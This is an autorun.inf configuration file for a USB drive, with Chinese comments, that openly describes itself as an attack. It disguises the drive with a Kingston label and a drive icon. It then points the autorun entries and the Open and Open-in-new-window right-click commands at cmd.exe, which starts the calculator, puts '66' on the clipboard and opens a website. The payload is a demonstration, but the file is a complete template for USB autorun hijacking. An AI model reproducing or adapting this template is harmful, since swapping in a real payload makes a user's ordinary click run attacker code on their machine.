[AutoRun] autoplay=true ; 伪装的U盘图标 icon=c:\windows\system32\shell32.dll,79 ; 驱动器名称 label=Kingston ; 攻击载荷:先打开计算器并输入66,再打开搜狐网 open=cmd.exe /c "start calc.exe && timeout /t 2 >nul && echo 66 | clip && timeout /t 1 >nul && start https://www.sohu.com" run=cmd.exe /c "start calc.exe && timeout /t 2 >nul && echo 66 | clip && timeout /t 1 >nul && start https://www.sohu.com" ; 劫持右键菜单 shell\open=打开(&O) shell\open\Command=cmd.exe /c "start calc.exe && timeout /t 2 >nul && echo 66 | clip && timeout /t 1 >nul && start https://www.sohu.com" shell\opennewwindow=在新窗口中打开(&E) shell\opennewwindow\Command=cmd.exe /c "start calc.exe && timeout /t 2 >nul && echo 66 | clip && timeout /t 1 >nul && start https://www.sohu.com"